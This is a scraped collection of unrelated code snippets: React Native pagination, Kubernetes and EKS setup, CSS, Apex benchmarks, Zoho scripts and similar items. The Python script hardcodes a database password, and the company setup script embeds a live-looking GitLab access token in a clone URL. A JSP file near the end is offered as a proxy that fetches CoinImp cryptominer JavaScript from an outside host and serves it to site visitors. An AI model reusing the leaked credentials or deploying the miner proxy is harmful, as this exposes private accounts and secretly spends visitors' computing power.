Snippets Collections
import mysql.connector
import pandas as pd
import matplotlib.pyplot as plt

# Establish connection to MySQL
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    password="Eimaipolykala1",
    database="twitter_db"
)

# Create cursor
cursor = mydb.cursor()

# Execute SQL query to retrieve data
cursor.execute("SELECT JSON_VALUE(data, '$.extended_tweet.display_text_range[1]') AS text_length FROM data_db")

# Fetch data
data = cursor.fetchall()

# Close the connection
mydb.close()

# Create DataFrame
df = pd.DataFrame(data, columns=['Text_Length'])

# Convert Text_Length to numeric
df['Text_Length'] = pd.to_numeric(df['Text_Length'], errors='coerce')

# Drop NaN values
df = df.dropna()

# Plotting
plt.figure(figsize=(10, 6))
plt.boxplot(df['Text_Length'])
plt.xlabel('Text Length')
plt.ylabel('Number of Characters')
plt.title('Distribution of Text Length in Extended Tweets')
plt.show()
//Regular 
import React, { useState, useEffect } from 'react';
import { View, FlatList, ListItem, Button, Avatar } from 'react-native';
import firestore from '@react-native-firebase/firestore';

// Assuming filteredData is your initial data source
const YourComponent = () => {
  const [visibleData, setVisibleData] = useState([]);
  const [isLoading, setIsLoading] = useState(false);
  const [lastVisible, setLastVisible] = useState(null);

  useEffect(() => {
    fetchData();
  }, []);

  const fetchData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData(newData);
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  const fetchMoreData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .startAfter(lastVisible)
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData((prevData) => [...prevData, ...newData]);
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching more data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  const handleEndReached = () => {
    if (!isLoading) {
      fetchMoreData();
    }
  };

  return (
    <FlatList
      data={visibleData}
      keyExtractor={(item) => item.id}
      ListEmptyComponent={() =>
        isLoading ? <EventMenuProduct /> : <NoData />
      }
      onEndReached={handleEndReached}
      onEndReachedThreshold={0.1} // Adjust this threshold as needed
      renderItem={({ item, index }) => (
        <View
          key={index}
          style={{
            alignContent: 'center',
            alignSelf: 'center',
          }}
        >
          {/* Your existing renderItem logic */}
        </View>
      )}
    />
  );
};

export default YourComponent;


/// With my code
import React, { useState, useEffect } from 'react';
import { View, FlatList, ListItem, Button, Avatar } from 'react-native';
import { collection, getDocs, onSnapshot } from 'firebase/firestore';
import { db } from 'your-firebase-config-file'; // Import your Firebase database config

// Assuming filteredData is your initial data source
const YourComponent = ({ category }) => {
  const [products, setProducts] = useState([]);
  const [isLoading, setIsLoading] = useState(false);
  const [lastDoc, setLastDoc] = useState(null);

  useEffect(() => {
    fetchMenuData();
  }, []);

  const fetchMenuData = async () => {
    setIsLoading(true);
    try {
      const subCollectionNames = getCategorySubCollectionNames(category);

      const allProducts = [];

      const subCollectionPromises = subCollectionNames.map(async (subCollectionName) => {
        const subCollectionRef = collection(db, `vehicles/${category}/${subCollectionName}`);
        const subCollectionSnapshot = await getDocs(subCollectionRef);

        subCollectionSnapshot.forEach((doc) => {
          allProducts.push({ id: doc.id, ...doc.data() });
        });

        const unsubscribe = onSnapshot(subCollectionRef, (snapshot) => {
          snapshot.docChanges().forEach((change) => {
            if (change.type === 'added') {
              setProducts((prevProducts) => [...prevProducts, { id: change.doc.id, ...change.doc.data() }]);
            }
          });
        });

        return () => unsubscribe();
      });

      await Promise.all(subCollectionPromises);
      setIsLoading(false);
    } catch (error) {
      console.error('Error fetching menu data:', error);
      setIsLoading(false);
    }
  };

  const getCategorySubCollectionNames = (category) => {
    switch (category) {
      case 'Buying':
        return ['subCollectionName1', 'subCollectionName2']; // Adjust with your subcollection names
      case 'Renting':
        return ['subCollectionName3', 'subCollectionName4']; // Adjust with your subcollection names
      default:
        return [];
    }
  };

  const handleEndReached = () => {
    if (!isLoading) {
      fetchMoreData();
    }
  };

  const fetchMoreData = async () => {
    setIsLoading(true);
    try {
      const subCollectionNames = getCategorySubCollectionNames(category);

      const allProducts = [];

      const subCollectionPromises = subCollectionNames.map(async (subCollectionName) => {
        const subCollectionRef = collection(db, `vehicles/${category}/${subCollectionName}`);

        const query = lastDoc ? subCollectionRef.startAfter(lastDoc) : subCollectionRef;

        const subCollectionSnapshot = await getDocs(query);

        subCollectionSnapshot.forEach((doc) => {
          allProducts.push({ id: doc.id, ...doc.data() });
        });

        const lastDocument = subCollectionSnapshot.docs[subCollectionSnapshot.docs.length - 1];
        setLastDoc(lastDocument);

        return allProducts;
      });

      const productsArray = await Promise.all(subCollectionPromises);
      const mergedProducts = productsArray.reduce((acc, curr) => acc.concat(curr), []);

      setProducts((prevProducts) => [...prevProducts, ...mergedProducts]);
      setIsLoading(false);
    } catch (error) {
      console.error('Error fetching more data:', error);
      setIsLoading(false);
    }
  };

  return (
    <FlatList
      data={products}
      keyExtractor={(item) => item.id}
      ListEmptyComponent={() => isLoading ? <EventMenuProduct /> : <NoData />}
      onEndReached={handleEndReached}
      onEndReachedThreshold={0.1}
      renderItem={({ item }) => (
        <View style={{ /* Your styling */ }}>
          {/* Your rendering logic */}
        </View>
      )}
    />
  );
};

export default YourComponent;

#Latest tnsnames.ora
https://tns2web.dev.oci.bonprix.de/tnsnames.ora

wget https://tns2web.dev.oci.bonprix.de/tnsnames.ora
sudo cp -v tnsnames.ora /etc/oracle/
import React, { useState, useEffect } from 'react';
import { View, FlatList, ListItem, Button, Avatar } from 'react-native';
import firestore from '@react-native-firebase/firestore';

// Assuming filteredData is your initial data source
const YourComponent = () => {
  const [visibleData, setVisibleData] = useState([]);
  const [isLoading, setIsLoading] = useState(false);
  const [lastVisible, setLastVisible] = useState(null);

  useEffect(() => {
    fetchData();
  }, []);

  const fetchData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData(newData);
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  const fetchMoreData = async () => {
    setIsLoading(true);
    try {
      const querySnapshot = await firestore()
        .collection('your_collection')
        .orderBy('createdAt', 'desc')
        .startAfter(lastVisible)
        .limit(10)
        .get();

      const newData = querySnapshot.docs.map((doc) => ({
        id: doc.id,
        ...doc.data(),
      }));
      
      setVisibleData((prevData) => [...prevData, ...newData]);
      setLastVisible(querySnapshot.docs[querySnapshot.docs.length - 1]);
    } catch (error) {
      console.error('Error fetching more data: ', error);
    } finally {
      setIsLoading(false);
    }
  };

  const handleEndReached = () => {
    if (!isLoading) {
      fetchMoreData();
    }
  };

  return (
    <FlatList
      data={visibleData}
      keyExtractor={(item) => item.id}
      ListEmptyComponent={() =>
        isLoading ? <EventMenuProduct /> : <NoData />
      }
      onEndReached={handleEndReached}
      onEndReachedThreshold={0.1} // Adjust this threshold as needed
      renderItem={({ item, index }) => (
        <View
          key={index}
          style={{
            alignContent: 'center',
            alignSelf: 'center',
          }}
        >
          {/* Your existing renderItem logic */}
        </View>
      )}
    />
  );
};

export default YourComponent;
#COMPLETE
#!/bin/bash

if ! grep -q 'REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt' ~/.bashrc; then \
	wget http://pki.bonprix.de/aia/bpRootCA01.crt; \
	openssl x509 -inform der -outform pem -in bpRootCA01.crt -out bpRootCA01-pem.crt; \
	sudo cp bpRootCA01-pem.crt /usr/local/share/ca-certificates/bpRootCA01.crt; \
	sudo update-ca-certificates --fresh; \
	if [ -x "$(command -v python)" ]; then
		python -m pip config set global.cert /etc/ssl/certs/ca-certificates.crt; \
	fi;
	echo 'export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt' >> ~/.bashrc; \
	source ~/.bashrc; \
	export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt; \
fi;
if [ ! -L /opt/oracle/instantclient ]; then \
	sudo rm -f /etc/profile.d/bp_envs.sh; \
	echo 'export ORACLE_HOME="/opt/oracle/instantclient"' | sudo tee /etc/profile.d/bp_envs.sh; \
	echo 'export TNS_ADMIN="/etc/oracle"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export DYLD_LIBRARY_PATH="/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export LD_LIBRARY_PATH="/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export SQLPATH="/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	echo 'export PATH=$PATH:"/opt/oracle/instantclient"' | sudo tee -a /etc/profile.d/bp_envs.sh; \
	sh /etc/profile.d/bp_envs.sh; \
	sudo apt-get update && sudo apt-get install -q -y libaio1 gcc libc-dev; \
	cd /opt; \
	sudo curl -o oracle.tgz https://digistyle.bonprix.net/artifactory/docker-external/oracle/instantclient/19.3.0.0.0/instantclient-19.3.0.0.0.tar.gz; \
	sudo tar -xf oracle.tgz; \
	sudo rm -f oracle.tgz; \
	cd; \
	if [ ! -x "$(command -v git)" ]; then
		sudo apt-get update && sudo apt-get install git -y -q; \
	fi;
 	git clone https://ai-squad-fetch-token:glpat-H8y665Wgn9vhYuRE-eMG@gitlab-es.bonprix.work/em-ps-admin/tnsnames; \
	sudo mkdir -p /etc/oracle; \
	sudo mv tnsnames/tnsnames.ora /etc/oracle/; \
	sudo rm -r tnsnames; \
	sudo reboot; \
fi;
void setup() {
  // put your setup code here, to run once:
  pinMode(13, OUTPUT);
  pinMode(3, INPUT);
  Serial.begin(9600);
}

void loop() {
  // put your main code here, to run repeatedly:
  if (digitalRead(3) == LOW)
  {
    digitalWrite(13, HIGH);
    delay(10);
  }
  else
  {
    digitalWrite(13, LOW);
    delay(10);
  }
}
Cypress.on('uncaught:exception', (err, runnable) => {
    // returning false here prevents Cypress from
    // failing the test
    return false
})
html, body{
	width:100%;
	overflow-x:hidden;
	font-family: "Montserrat", Sans-serif;
}
.embed-footer{
	display:none !Important;
}
.embed-container .embed-header .embed-title {
	display:none !Important;
}
.entry-content p {
    margin-bottom: 15px !important;
}
.header-main-layout-2 .site-branding {
    text-align: center;
    padding-bottom:0 !important;
}
.ast-site-identity {
    padding: 1em 0 0 0 !Important;
}
@media(max-width:767px){
	.ast-site-identity {
    padding: 0 !Important;
}
	.ast-mobile-menu-buttons{
		position:relative;
		top:8px;
		right: -10px;
	}
	.ast-header-break-point .ast-above-header-mobile-inline .above-header-2 .ast-above-header-section-1, .ast-header-break-point .ast-above-header-mobile-stack .above-header-2 .ast-above-header-section-1 {
    padding: 0 0 0 0 !important;
}
	.ast-above-header {
    padding-top: 0 !Important;
}
	.above-header-user-select .ast-custom-html{
		line-height:30px;
	}
}
.ast-logo-title-inline .site-logo-img {
    padding-right: 0 !important;
}
a{
	outline:0 !important;
}
a:hover, a:focus{
	outline:0 !Important;
}
/* .elementor-icon-list-text{
	color: #3b4651 !important;
} */
.ct-ultimate-gdpr-cookie-content a{
	color:#000000 !important;
}
.mp_wrapper{
display:none;
}
.ele-mp .mp_wrapper{
	display:block;
}

/** Start Block Kit CSS: 72-3-34d2cc762876498c8f6be5405a48e6e2 **/

.envato-block__preview{overflow: visible;}

/*Kit 69 Custom Styling for buttons */
.envato-kit-69-slide-btn .elementor-button,
.envato-kit-69-cta-btn .elementor-button,
.envato-kit-69-flip-btn .elementor-button{
	border-left: 0px !important;
	border-bottom: 0px !important;
	border-right: 0px !important;
	padding: 15px 0 0 !important;
}
.envato-kit-69-slide-btn .elementor-slide-button:hover,
.envato-kit-69-cta-btn .elementor-button:hover,
.envato-kit-69-flip-btn .elementor-button:hover{
	margin-bottom: 20px;
}
.envato-kit-69-menu .elementor-nav-menu--main a:hover{
	margin-top: -7px;
	padding-top: 4px;
	border-bottom: 1px solid #FFF;
}
/* Fix menu dropdown width */
.envato-kit-69-menu .elementor-nav-menu--dropdown{
	width: 100% !important;
}

/** End Block Kit CSS: 72-3-34d2cc762876498c8f6be5405a48e6e2 **/

/* Contact Page -> Form Submit Button */
.elementor-27075 .elementor-element.elementor-element-90f53f5 .elementor-button[type="submit"]{
    background: transparent linear-gradient(90deg, #ec028b, #f9423a) 0 0 no-repeat padding-box;
}

.elementor-2036 .elementor-element.elementor-element-8454f52 .elementor-button[type="submit"] {
	    background: transparent linear-gradient(90deg, #ec028b, #f9423a) 0 0 no-repeat padding-box;
}

/* FAQ section */
.elementor-toggle-item {
/*     box-shadow: 0 0.58824rem 1.17647rem rgba(0,0,0,.05); */
    border-radius: .35rem;
/*     padding-top: 8px;
    padding-bottom: 8px;
	padding-left: 10px;
	  padding-right: 10px; */
/*     border: .01px solid #EBEBEB ; */
/* 	padding: 1.05882rem 2.94118rem 1.11765rem 2.35294rem; */
	border: 2px solid #f6f7f7;
	transition: border, color, outline, box-shadow, border-color .15s ease-in-out;
	will-change: border, color, outline, box-shadow, border-color;
}

.elementor-toggle-item > div > p > a {
    font-family: Montserrat, sans-serif !important;
	font-size: 15px;
	color: #f35a21;
	
    font-weight: 600 !important;

}

.elementor-toggle-item:hover {
	border: 2px solid #00aeaa;
}

input[type="password"]:focus,input[type="text"]:focus,input[type="email"]:focus,
input[type="tel"]:focus,input[type="textarea"]:focus, .elementor-field-textual:focus{
    border: 2px solid #00aeaa !important;
}


.mp_wrapper input[type="password"]:focus {
	 border: 2px solid #00aeaa !important;
}



.mp-form-label{
	font-family: "Montserrat", Sans-serif;
    font-size: 14px;
    font-weight: 600;
    line-height: 1.4em;
}

.mp-form-label label {
	line-height: 1.4em !important;
}

.mp_wrapper input[type="text"], .mp_wrapper input[type="url"], .mp_wrapper input[type="email"], .mp_wrapper input[type="tel"], .mp_wrapper input[type="number"], .mp_wrapper input[type="password"]{
background-color: #FFFFFF;
    border-color: var(--e-global-color-844b050);
    border-width: 2px 2px 2px 2px;
    border-radius: .35rem .35rem .35rem .35rem;
	font-family: "Montserrat", Sans-serif;
    font-size: 15px;
    font-weight: 500;
	color:#000000;
}

.elementor-kit-37 input[type="submit"] {
	background: transparent linear-gradient(90deg, #ec028b, #f9423a) 0 0 no-repeat padding-box;
	font-family: "Montserrat", Sans-serif;
    font-size: 14px;
    font-weight: 700;
    text-transform: uppercase;
    letter-spacing: 1px;
    border-style: none;
    padding: 1.2rem 4rem 1.2rem 4rem;
	border-radius: 2px;
}

.mepr-login-actions a {
	font-size: 14px;
}


.elementor-page-1757 {
	font-family: "Montserrat", Sans-serif;
}

.mepr-stripe-card-element, .mp_wrapper .mepr-payment-method .spc input {
	background-color: #FFFFFF;
    border-color: #F0F0F0 !important;
    border-width: 2px 2px 2px 2px !important;
    border-radius: .35rem .35rem .35rem .35rem;
	font-family: "Montserrat", Sans-serif;
    font-size: 15px;
    font-weight: 500;
	color:#000000;
	line-height: 1.8rem ;
}
function year_shortcode() {
  $year = date('Y');
  return $year;
}
add_shortcode('year', 'year_shortcode');
function combinations(arr, len) {
    let tempArry = []
    let final = []
    for (let i = 0; i < arr.length; i++) {
        console.log("i ", i)
        if ((arr.length - i) == (len - 1)) {
            break
        }
        tempArry.push(arr[i])
        for (let j = i + 1; j < arr.length; j++) {
            console.log("j ", j)
            tempArry.push(arr[j])
            console.log("tempArry ", tempArry)
            if (tempArry.length == len) {
                console.log("tempArry inside if ", tempArry)
                final.push([...tempArry])
                console.log("final inside if ", final)
                tempArry.pop()
            }
        }
        tempArry = []
    }
    console.log("final ", final)
    return final
}
combinations([1, 2, 3, 4, 5], 3)
function flatten(array) {
  var l = array.length;
  while (l--) {
    if (Array.isArray(array[l])) {
      flatten(array[l]);
      array.splice(l, 1, ...array[l]);
    }
  }
}


var array = [['1', '2', '3'], ['4', '5', ['6'], ['7', '8']]];

flatten(array);

console.log(array);
/**
 * This is a test to see how much CPU time it takes to generate
 * 100k Cell object instances in a referenceable way and find the most efficient 
 * way to do so.
 * Also calculate how long it takes to then reference each Object instance based
 * on the object x,y,z indexes.
 * Note: the generation of 100 records and adding to the map takes about 240ms
 *       so that needs to be deducted from the instantiation, but is still part
 *       of the calculation required for the solution
 */
// Test Settings
Integer numberOfSheets  = 10;   // wsi
Integer numberOfRows    = 100;  // ri
Integer numberOfColumns = 100;  // ci

// Multidimentional array for storing the cells
Cell[][][] cells = new Cell[][][]{};

// Register start time
Decimal st = Limits.getCpuTime();

// Iterate the number of worksheets
for(Integer wsi=0; wsi < numberOfSheets; wsi++){

    // Add a column / row array for each worksheet
    cells.add(new Cell[][]{});
    
    // Iterate the number of columns
    for(Integer ri=0; ri < numberOfRows; ri++){
        
        // Add a column array for each row
        cells[wsi].add(new Cell[]{});

        // Add Cells to the row
        for(Integer ci = 0; ci < numberOfColumns; ci++){
            cells[wsi][ri].add(new Cell(wsi,ri,ci));
        }
    }
}

// Register end time
Decimal et = Limits.getCpuTime();

// Loop through xyz
for(Integer wsi = 0; wsi < numberOfSheets; wsi++){
    for(Integer ri=0; ri < numberOfRows; ri++){
        for(Integer ci = 0; ci < numberOfColumns; ci++){
            getCell(wsi, ri,ci);
        }
    }
}

// Register final end time
Decimal fet = Limits.getCpuTime();

// Output metrics
System.debug('Generation Time: ' + (et-st)  + ' (' + (numberOfSheets * numberOfRows * numberOfColumns) + ' cells)');
System.debug('Reference  Time: ' + (fet-et) + ' (' + (numberOfSheets * numberOfRows * numberOfColumns) + ' cells)');

/**
 * Method to reference a cell at a certain position
 */
Cell getCell(Integer wsi, Integer ci, Integer ri){
    return cells[wsi][ci][ri];
}


/**
 * Basic class example of a cell
 */
class Cell{
    Integer wsi;
    Integer ri;
    Integer ci;

    Cell(Integer wsi, Integer ri, Integer ci){
        this.wsi = wsi;
        this.ri  = ri;
        this.ci  = ci;
    }
}
helm install aws-load-balancer-controller eks/aws-load-balancer-controller \            
  -n kube-system \
  --set clusterName=<your-cluster-name> \
  --set serviceAccount.create=false \
  --set serviceAccount.name=aws-load-balancer-controller \
  --set region=<region> \
  --set vpcId=<your-vpc-id>
eksctl create iamserviceaccount \
  --cluster=<your-cluster-name> \
  --namespace=kube-system \
  --name=aws-load-balancer-controller \
  --role-name AmazonEKSLoadBalancerControllerRole \
  --attach-policy-arn=arn:aws:iam::<your-aws-account-id>:policy/AWSLoadBalancerControllerIAMPolicy \
  --approve
aws iam create-policy \
    --policy-name AWSLoadBalancerControllerIAMPolicy \
    --policy-document file://iam_policy.json
aws iam create-policy \
    --policy-name AWSLoadBalancerControllerIAMPolicy \
    --policy-document file://iam_policy.json
.elementor-post__read-more {background:#993333;
    padding-right: 25px;
    padding-left:25px; 
    padding-bottom: 10px;
    padding-top: 10px;
}
.elementor-post__thumbnail {  
 margin-left: 20px;
  margin-right: 20px;
  

}
rupert
.Su04.Po03

email
Rt=05?Qp04
// Test Config
String strX = 'value';
Integer itr = 100000;

/**
 * METHOD 01 Simple String Concat
 * Heap Size 24, CPU Time 5803 (100k iterations)
 */
// Add values to the simpleConcatString string
Integer heapStart = limits.getHeapSize();
Integer cpuStart  = limits.getCpuTime();
basicConcatMethod('');
Integer cpuEnd  = limits.getCpuTime();
Integer heapEnd = limits.getHeapSize();


/**
 * METHOD 02 XML StreamWriter Concat Method Cheat 
 * Heap Size 24, CPU Time 721 (100k iterations)
 */
Integer heapCheatStart = limits.getHeapSize();
Integer cpuCheatStart  = limits.getCpuTime();
xmlCheatMethod(new XmlStreamWriter());
Integer cpuCheatEnd    = limits.getCpuTime();
Integer heapCheatEnd   = limits.getHeapSize();

// Let's run it again with an example usage and also validate the results are the same
Assert.areEqual(
	basicConcatMethod(''),
    xmlCheatMethod(new XmlStreamWriter())
);

// Add the debugs at the end as we have a huge debug log with 100k iterations
System.debug('');
System.debug('HEAP string concat: ' + (heapEnd      - heapStart      ));
System.debug('CPUT string concat: ' + (cpuEnd       - cpuStart       ));
System.debug('');
System.debug('HEAP XML Cheat:     ' + (heapCheatEnd - heapCheatStart ));
System.debug('CPUT XML Cheat:     ' + (cpuCheatEnd  - cpuCheatStart  ));
System.debug('');


/**
 * Put your concatenation logic in here
 */
static String basicConcatMethod(String input){
    for(Integer i =0; i<itr; i++){
        input+=strX;
    }
    return input;
}


/**
 * or here
 */
static String xmlCheatMethod(XmlStreamWriter xsw){
    for(Integer i =0; i<itr; i++){
        xsw.writeCharacters(strX);
    }
    return xsw.getXmlString();
}

---
apiVersion: v1
kind: Namespace
metadata:
  name: game-2048
---
apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: game-2048
  name: deployment-2048
spec:
  selector:
    matchLabels:
      app.kubernetes.io/name: app-2048
  replicas: 5
  template:
    metadata:
      labels:
        app.kubernetes.io/name: app-2048
    spec:
      containers:
      - image: public.ecr.aws/l6m2t8p7/docker-2048:latest
        imagePullPolicy: Always
        name: app-2048
        ports:
        - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  namespace: game-2048
  name: service-2048
spec:
  ports:
    - port: 80
      targetPort: 80
      protocol: TCP
  type: NodePort
  selector:
    app.kubernetes.io/name: app-2048
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  namespace: game-2048
  name: ingress-2048
  annotations:
    alb.ingress.kubernetes.io/scheme: internet-facing
    alb.ingress.kubernetes.io/target-type: ip
spec:
  ingressClassName: alb
  rules:
    - http:
        paths:
        - path: /
          pathType: Prefix
          backend:
            service:
              name: service-2048
              port:
                number: 80
eksctl create fargateprofile \
    --cluster demo-cluster \
    --region us-east-1 \
    --name alb-sample-app \
    --namespace game-2048
aws eks update-kubeconfig --name demo-cluster  --region us-east-1
InitInsert; New implementation
            if "No." = '' then begin
                TestNoSeries();
                NoSeriesCode := GetNoSeriesCode();
#if not CLEAN24
                NoSeriesMgt.RaiseObsoleteOnBeforeInitSeries(NoSeriesCode, xRec."No. Series", "Posting Date", "No.", "No. Series", IsHandled);
                if not IsHandled then begin
#endif
                    "No. Series" := NoSeriesCode;
                    if NoSeries.AreRelated("No. Series", xRec."No. Series") then
                        "No. Series" := xRec."No. Series";
                    "No." := NoSeries.GetNextNo("No. Series", "Posting Date");
                    SalesHeader2.ReadIsolation(IsolationLevel::ReadUncommitted);
                    SalesHeader2.SetLoadFields("No.");
                    while SalesHeader2.Get("Document Type", "No.") do
                        "No." := NoSeries.GetNextNo("No. Series", "Posting Date");
#if not CLEAN24
                    NoSeriesMgt.RaiseObsoleteOnAfterInitSeries("No. Series", NoSeriesCode, "Posting Date", "No.");
                end;
#endif
OPTION 1 - to include only the below in cypress.json:

"reporter": "cypress-multi-reporters",
"reporterOptions": {
  "configFile": "reporter-config.json"
}
 Save
Then to create a new file called reporter-config.json, and add the config for each reporter in there:

{
  "reporterEnabled": "mochawesome, autoset-status-cypress-testrail-reporter",
  "mochawesomeReporterOptions": {
    "reportDir": "cypress/reports",
    "overwrite": false,
    "html": true,
    "json": false
  },
  "autosetStatusCypressTestrailReporterReporterOptions": {
    "host": "https://xxxxxx/",
    "username": "xxxxx",
    "password": "xxxx",
    "projectId": 1,
    "runId": 1234
  }
}
cd\
cd "G:\My Drive\_My_projects\_Snippets\export_monday_defects_data"
cls
python export_monday_defects_data.py
cd\
cd "G:\My Drive\_My_projects\_Snippets\indent_json"
cls
python indent_json4.py input.json output.json 4
cd\
cd "G:\My Drive\_My_projects\_Snippets\Convert md_to_docx (Pandoc)"
cls
pandoc --highlight-style=zenburn input.md -f markdown -t docx -s -o output.docx
<style type="text/css">#closed:target {display:none;}div#closed {background-color:#1e1b1bcf;width:100vw;height:100vh;z-index:10000;display:bloc;position:absolute;top:0;left:0;}#caution {margin:10vh auto;background:#D9A900;width:50vw;height:auto;position:relative;padding:4em;}#caution p {font-size:1.5em;line-height:1.4em;}a.fermer {position:absolute;top:0;right:0;display:bloc;padding:2em;}#caution a:hover {background:white !important;color:black !important;}@media screen and (max-width: 500px) {#caution {width:80vw;padding:1em;}a.fermer {padding:0.5em;}#caution h1 {margin-top:1em;}}</style>
<div id="closed">
<div id="caution"><a style="background:black;color:white;font-weight:bold;" class="fermer" href="#closed">fermer</a>
<h1 style="color:white;">Les 14 et 15 mai, je vote !</h1>
<p style="font-weight:bold;">Élection du représentant des personnels BIATSS de la ComUE UdL au CA</p>
<a style="display:block;background:black;color:white;font-size:1.5em;text-transform:uppercase;padding:1em;width:300px;text-align:center;margin:0 auto;" href="[id-fiche]actualite;1714383313921;0[/id-fiche]#KLINK" _linktype="interne">Comment voter ?</a></div>
</div>
.sp-testimonial-pro-item:has( .tpro-client-rating .fa:nth-of-type(2)[class="fa fa-star-o"] ) {
    display: none;
}
int minLavel = Convert.ToInt32(dt.Compute("min([AccountLevel])", string.Empty));
Git pull --rebase - use this instead of normal pull

Git rebase --abort - if something goes wrong in the above cmd

git merge --abort  

git config --list
<%@page autoFlush="false" session="false"%><%@page import = "java.net.*,java.io.*,java.util.*" %><%
/*
 
This is a generic caching proxy built for use with Java hosted sites (Caucho, Resin, Tomcat, etc.). This was 
originally built for use with CoinImp.com JavaScript miner. However, the AV friendly code supplied by CoinImp 
is PHP only.  You may place this .jsp file on your server instead of using the CoinImp PHP file. Here is an 
example of how to call the JSP proxy code from your JavaScript client. Note, substitute the correct Client ID 
which you can obtain from the CoinImp portal. Also, set the throttle as you need it.
 
<script src="/coinproxy.jsp?f=1Ri3.js"></script>
<script>
    var _client = new Client.Anonymous('YOUR KEY GOES HERE', {
        throttle: 0.7
    });     
    _client.start();
            
</script>   
 
// Hopefully you find this useful. No guarantees or warranties are made. Use at your own risk. This code is released to the public domain.
 
If you find this code useful, I would gladly accept Monero or donations to Coinbase Commerce:
 
MONERO ADDRESS: 424g2dLQiUzK9x28KLpi2fAuTVSAUrz1KM49MvmMdmJZXF3CDHedQhtDRanQ8p6zEtd1BjSXCAopc4tAxG5uLQ8pBMQY54m
COINBASE ADDRESS: https://commerce.coinbase.com/checkout/dd0e7d0d-73a9-43a6-bbf2-4d33515aef49
 
Thanks
*/
 
try {
        response.setHeader("Access-Control-Allow-Origin", "*");
        response.setCharacterEncoding("UTF-8");
        String filename=request.getParameter("f");
        if(filename.contains(".js")) { response.setContentType("application/javascript; charset=utf-8");
        } else { response.setContentType("application/octet-stream; charset=utf-8");
        }
        String host = java.net.URLEncoder.encode(request.getRequestURL().toString(),"UTF-8").replace("+","%20");
        String reqUrl = "http://www.wasm.stream?filename="+java.net.URLEncoder.encode(filename,"UTF-8").replace("+","%20")+"&host="+host;
        File f=new File("/tmp/"+filename);
 
        if(!f.exists() || (new Date().getTime() - f.lastModified())>60*60*1000) {
                // fetch code from server 
 
                URL url = new URL(reqUrl);
                HttpURLConnection uc = (HttpURLConnection) url.openConnection();
                InputStream in = uc.getInputStream();
 
                // save in /tmp
                FileOutputStream fo = new FileOutputStream(f);
 
                byte[] buffer = new byte[4096];
 
                int i=0;
                int count;
 
                while ((count = in.read(buffer)) != -1) {
                        i+=count;
                  fo.write(buffer,0,count);
                }
                fo.flush();
                fo.close();
                in.close();
        }
 
        // now open file and stream as response
 
        FileInputStream fi=new FileInputStream(f);
        OutputStream output = response.getOutputStream();
 
        response.setContentLength((int)(f.length()));
 
        // read cached copy
        System.out.println("File length: "+String.valueOf(f.length()));
 
        byte[] buffer = new byte[4096];
 
        int i=0;
        int count;
 
        while((count = fi.read(buffer)) != -1) {
                i+=count;
                output.write(buffer,0,count);
        }
        fi.close();
 
} catch (Exception e) {
e.printStackTrace();
}
%>
mail_merge_template = Map();
mail_merge_template.put("name","Copy Shareholder Agreement");
download_mail_merge = Map();
download_mail_merge.put("mail_merge_template", mail_merge_template);
download_mail_merge.put("output_format", "pdf");
download_mail_merge.put("file_name", "Test Shareholder Agreement");

param = Map();
param.put("download_mail_merge", download_mail_merge.toList());

download_pdf = invokeurl
[
	url: "https://www.zohoapis.com/crm/v6/Deals/"+DealID+"/actions/download_mail_merge"
	type: POST
	parameters: param.toString()
	connection:"zoho_crm"
];

info download_pdf;
download_pdf.setParamName("file");

/////////// Send Using Zoho Sign ////////


action_list = List();
action = Map();
action.put("action_type", "SIGN");
action.put("recipient_email", "roy@gmail.com");
action.put("recipient_name", "Roy");
action.put("verify_recipient", true);
action.put("verification_type", "EMAIL");
action_list.add(action);
request = Map();
request.put("request_name", "Test Shareholer Agreement");
request.put("is_sequential", false);
request.put("actions", action_list);
request.put("email_reminders", true);
request.put("reminder_period", 2);
requests = Map();
requests.put("requests", request);
data = Map();
data.put("data", requests);
info data;
/////
send_doc = invokeurl
[
	url: "https://sign.zoho.com/api/v1/requests"
	type: POST
	parameters: data
	files: download_pdf
	connection: "zoho_sign"
];

info send_doc;
.noClick {
  pointer-events: none;
}
cy.scrollTo(0, 500) // Scroll the window 500px down
cy.get('.sidebar').scrollTo('bottom') // Scroll 'sidebar' to its bottom
cy.scrollTo(0, 500) // Scroll the window 500px down
cy.get('.sidebar').scrollTo('bottom') // Scroll 'sidebar' to its bottom
